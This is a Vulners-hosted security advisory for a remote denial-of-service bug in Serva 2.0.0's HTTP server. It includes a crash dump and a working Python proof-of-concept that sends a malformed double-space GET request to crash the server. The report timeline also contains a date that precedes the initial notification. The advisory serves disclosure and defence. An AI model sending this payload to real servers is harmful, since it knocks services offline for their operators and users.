Vulners
Lucene search
Serva 2.0.0 HTTP Server Denial Of Service
`Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
-----------------------
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-12-07
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.
The application uses a space delimiter to parse a GET Request. Adding
more than one space (\x20) behind the GET will cause the application to
crash with an unhandled c++ exception.
(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e pop esi
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
import socket
target="192.168.0.21"
port=80
# 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.
# 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19
# 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont
# 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...
# 0040 0a .
payload = (
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)
print "[*] Sending malformed request..."
s.send(payload)
print "[!] Exploit has been sent!\n"
s.close()
For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34
6. SOLUTION
-----------
None
7. REPORT TIMELINE
------------------
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure
8. REFERENCES
-------------
http://security.inshell.net/advisory/34
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2013 00:00Current
7.4High risk
Vulners AI Score7.4